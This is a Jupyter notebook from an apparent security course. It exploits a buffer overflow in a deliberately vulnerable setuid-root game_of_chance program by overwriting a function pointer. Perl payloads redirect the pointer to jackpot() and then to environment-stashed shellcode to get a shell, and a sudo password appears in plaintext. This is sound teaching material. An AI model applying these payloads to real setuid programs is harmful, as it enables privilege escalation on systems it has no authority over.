# Overflowing Function Pointers
- recall function pointers are pointers that store addresses of functions/code
    - see CFundamentals Notebooks for a review
- function pointers can be overwritten using overflow techniques to point to different code/function

## game of chance
- hacking book provides game_of_chance.c program
- program uses a function pointer to remember the last game played
- the pointer is stored in the **user** structure
- player is declared as an uninitialized global variable
    - meaning the memory is allocated in the **bss** segment
    
- copy, examine, compile and run game_of_change.c program

## Note: user is password for current user running notebook with sudo priviledge

In [5]:
! cp ./booksrc/game_of_chance.c .
! cp ./booksrc/hacking.h . # hacking.h is untility header file

In [3]:
! cat game_of_chance.c

#include <stdio.h>
#include <string.h>
#include <fcntl.h>
#include <sys/stat.h>
#include <time.h>
#include <stdlib.h>
#include "hacking.h"

#define DATAFILE "/var/chance.data" // File to store user data

// Custom user struct to store information about users
struct user {
   int uid;
   int credits;
   int highscore;
   char name[100];
   int (*current_game) ();
};

// function prototypes
int get_player_data();
void register_new_player();
void update_player_data();
void show_highscore();
void jackpot();
void input_name();
void print_cards(char *, char *, int);
int take_wager(int, int);
void play_the_game();
int pick_a_number();
int dealer_no_match();
int find_the_ace();
void fatal(char *);

// Global variables
struct user player;      // Player struct

int main() {
   int choice, last_game;

   srand(time(0)); // Seed the randomizer with the current time.
   
   if(get_player_data() == -1) // Try to read player data from file.
      register_new_player();    // If there is no data, reg

In [18]:
! echo user | sudo -S ./compile.sh game_of_chance.c game_of_chance

[sudo] password for user: game_of_chance.c: In function ‘get_player_data’:
game_of_chance.c:97:10: warning: implicit declaration of function ‘getuid’; did you mean ‘getenv’? [-Wimplicit-function-declaration]
    uid = getuid();
          ^~~~~~
          getenv
game_of_chance.c:102:17: warning: implicit declaration of function ‘read’; did you mean ‘fread’? [-Wimplicit-function-declaration]
    read_bytes = read(fd, &entry, sizeof(struct user)); // Read the first chunk.
                 ^~~~
                 fread
game_of_chance.c:106:4: warning: implicit declaration of function ‘close’; did you mean ‘pclose’? [-Wimplicit-function-declaration]
    close(fd); // close the file
    ^~~~~
    pclose
game_of_chance.c: In function ‘register_new_player’:
game_of_chance.c:129:4: warning: implicit declaration of function ‘write’; did you mean ‘fwrite’? [-Wimplicit-function-declaration]
    write(fd, &player, sizeof(struct user));
    ^~~~~
    fwrite


In [19]:
# program uses /var/chance.data to store player's information
# let's take a look at it
! echo user | sudo -S cat /var/chance.data

[sudo] password for user: �  �  �  Ram Basnet AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA    

### interactive program
- game_of_chance is an interactive program that doesn't work with Jupyter Notebook as of Aug. 6 2020
- Use Terminal to run the program; follow the menu provided by the program to play the game
- use CTRL-Z to temporarily suspend the current process

In [22]:
! ls -l ./game_of_chance

-rwxr-xr-x 1 root root 21592 Aug  6 15:51 ./game_of_chance


In [23]:
# make sure game of chance is owned by root
! echo user | sudo -S chown root:root game_of_chance

[sudo] password for user: 

In [24]:
# the program can write to /var/ folder as long as it's setuid program
! echo user | sudo -S chmod +s ./game_of_chance

[sudo] password for user: 

In [25]:
! ls -l ./game_of_chance

-rwsr-sr-x 1 root root 21592 Aug  6 15:51 ./game_of_chance


## Detect flaw in the program
- note **user** struct has declared name buffer of 100 bytes
- input_name() function reads and stores into name field one character at a time until '\n'
- there's nothing to limit it to the length of the destination buffer!

## Exploit the overflow flaw
- explore the memory addresses of name and current_game using peda/gdb
- find the process id of game_of_chance program that's running
```
$ ps aux | grep game_of_chance
$ sudo gdb -q --pid=process id of game_of_chance --symbols=exe with symbols
$ x/x &player.name
$ x/x &player.current_game
$ p/u (address of player.current_game) - (address of player.name)
```
- name[100] is at a lower address
- (\*current_game)() is at a higher address find the exact size that would overlfow the 
- the offset should be 100
- create a buffer with 100As + BBBB
- detach the process from gdb and change the name with menu option 5 pasting the following buffer
- Enter 1 and the buffer should overwrite the [DEBUG] current_game pointer @ 0x42424242

In [14]:
! perl -e 'print "A"x100 . "B"x4 . "\n"'

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB


### Find useful functions/code in the program
- nm commands lists symbols in object files with corresponding addresses
    - can be used to find addresses of various functions in a program
- jackpot() is intruiging!

In [15]:
! nm game_of_chance

0804c05c B __bss_start
         U close@@GLIBC_2.0
0804c060 b completed.6612
0804c054 D __data_start
0804c054 W data_start
080493b6 T dealer_no_match
08048680 t deregister_tm_clones
08048660 T _dl_relocate_static_pie
08048700 t __do_global_dtors_aux
0804bf10 t __do_global_dtors_aux_fini_array_entry
0804c058 D __dso_handle
080487dc T dump
0804bf14 d _DYNAMIC
08048799 T ec_malloc
0804c05c D _edata
0804c0f4 B _end
         U exit@@GLIBC_2.0
08048736 T fatal
080495b3 T find_the_ace
080499e8 T _fini
080499fc R _fp_hw
08048730 t frame_dummy
0804bf0c t __frame_dummy_init_array_entry
0804a938 r __FRAME_END__
08048b55 T get_player_data
         U getuid@@GLIBC_2.0
0804c000 d _GLOBAL_OFFSET_TABLE_
         w __gmon_start__
0804a538 r __GNU_EH_FRAME_HDR
080484cc T _init
0804bf10 t __init_array_end
0804bf0c t __init_array_start
08048f92 T input_name
08049a00 R _IO_stdin_used
         U __isoc99_scanf@@GLIBC_2.7
08048f41 T jackpot
080499e0 T __libc_csu_fini
08049980 T __libc_csu_init
         U __l

### scripting the interactive commands
- instead of interactively typing options and commands interactively, they can be scripted and piped to the program
- program can then parse and use the input as if someone is interactively typing it
- make sure the game has been played atleast once by the current user
    - the following script needs to start with full name otherwise!

In [26]:
# plagy game #1, Enter 10, Enter 7 to quit
! perl -e 'print "1\n10\nn\n7\n"' | ./game_of_chance

-=[ Game of Chance Menu ]=-
1 - Play the Pick a Number game
2 - Play the No Match Dealer game
3 - Play the Find the Ace game
4 - View current high score
5 - Change your user name
6 - Reset your account at 100 credits
7 - Quit
[Name: Ram Basnet]
[You have 1250 credits] ->  
[DEBUG] current_game pointer @ 0x0804926b

####### Pick a Number ######
This game costs 10 credits to play. Simply pick a number
between 1 and 20, and if you pick the winning number, you
will win the jackpot of 100 credits!

10 credits have been deducted from your account.
Pick a number between 1 and 20: The winning number is 18
Sorry, you didn't win.

You now have 1240 credits
Would you like to play again? (y/n)  -=[ Game of Chance Menu ]=-
1 - Play the Pick a Number game
2 - Play the No Match Dealer game
3 - Play the Find the Ace game
4 - View current high score
5 - Change your user name
6 - Reset your account at 100 credits
7 - Quit
[Name: Ram Basnet]
[You have 1240 credits] ->  
Thanks for playing! Bye.


In [27]:
# let's create a string mimicking game play with jackpot address!
! perl -e 'print "1\n19\nn\n5\n" . "A"x100 . "\x41\x8f\x04\x08\n" . "1\nn\n7\n"'

1
19
n
5
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�
1
n
7


In [28]:
# now let's hit the Jackpot!
! perl -e 'print "1\n19\nn\n5\n" . "A"x100 . "\x41\x8f\x04\x08\n" . "1\nn\n7\n"' | ./game_of_chance

-=[ Game of Chance Menu ]=-
1 - Play the Pick a Number game
2 - Play the No Match Dealer game
3 - Play the Find the Ace game
4 - View current high score
5 - Change your user name
6 - Reset your account at 100 credits
7 - Quit
[Name: Ram Basnet]
[You have 1240 credits] ->  
[DEBUG] current_game pointer @ 0x0804926b

####### Pick a Number ######
This game costs 10 credits to play. Simply pick a number
between 1 and 20, and if you pick the winning number, you
will win the jackpot of 100 credits!

10 credits have been deducted from your account.
Pick a number between 1 and 20: The winning number is 5
Sorry, you didn't win.

You now have 1230 credits
Would you like to play again? (y/n)  -=[ Game of Chance Menu ]=-
1 - Play the Pick a Number game
2 - Play the No Match Dealer game
3 - Play the Find the Ace game
4 - View current high score
5 - Change your user name
6 - Reset your account at 100 credits
7 - Quit
[Name: Ram Basnet]
[You have 1230 credits] ->  
Change user name
Enter your new nam

In [29]:
# let's hit the Jackpot 10 times in a row!
# and change to your actual name
! perl -e 'print "1\n19\nn\n5\n" . "A"x100 . "\x41\x8f\x04\x08\n" . "1\n" . "y\n"x10 . "n\n5\nRam Basnet\n7\n"' | ./game_of_chance

-=[ Game of Chance Menu ]=-
1 - Play the Pick a Number game
2 - Play the No Match Dealer game
3 - Play the Find the Ace game
4 - View current high score
5 - Change your user name
6 - Reset your account at 100 credits
7 - Quit
[Name: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA]
[You have 1330 credits] ->  
[DEBUG] current_game pointer @ 0x0804926b

####### Pick a Number ######
This game costs 10 credits to play. Simply pick a number
between 1 and 20, and if you pick the winning number, you
will win the jackpot of 100 credits!

10 credits have been deducted from your account.
Pick a number between 1 and 20: The winning number is 7
Sorry, you didn't win.

You now have 1320 credits
Would you like to play again? (y/n)  -=[ Game of Chance Menu ]=-
1 - Play the Pick a Number game
2 - Play the No Match Dealer game
3 - Play the Find the Ace game
4 - View current high score
5 - Change your user name
6 - Reset your account at 100 credits
7 

## Exploiting with shellcode
- as the program is setuid; it "should" give you a root shell if you can manage to smuggle and execute your shellcode!

## Stashing shellcode as environment variable
- one easy way to exploit is by stashing shellcode as an environment variable
- once the shellcode is exported, you can use getenvaddr program provided by booksrc
- use the address relative to the game_of_chance program to execute the stashed shellcode
- run all or some of the following commands in Terminal

In [1]:
! cp ./booksrc/shellcodex86linuxexec .

In [2]:
! cp ./booksrc/getenvaddr .

In [3]:
! export SHELLCODE=$(cat ./shellcodex86linuxexec)

In [4]:
# run this in terminal
! ./getenvaddr SHELLCODE ./game_of_chance

SHELLCODE will be at 0xfffffff8


In [5]:
# copy the address of SHELLCODE after Ax1000
! perl -e 'print "1\n18\nn\n5\n" . "A"x100 . "\xb5\xdb\xff\xff\n" . "1\n"' > game_of_chance_exploit

In [6]:
! cat game_of_chance_exploit

1
18
n
5
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA����
1


### finally, exploit the program
- run this in terminal

``` 
$ cat game_of_chance_exploit - | ./game_of_chance
```
- NOTICE: the hyphen after the exploit
- tells the cat program to send standard input after the exploit buffer, returning control of the input
- eventhough the shell doesn't display its prmompt, it is still accessible but doesn't escalate privileges

## Exercise
- smuggle the shellcode into the name field, find it's address and exploit the program.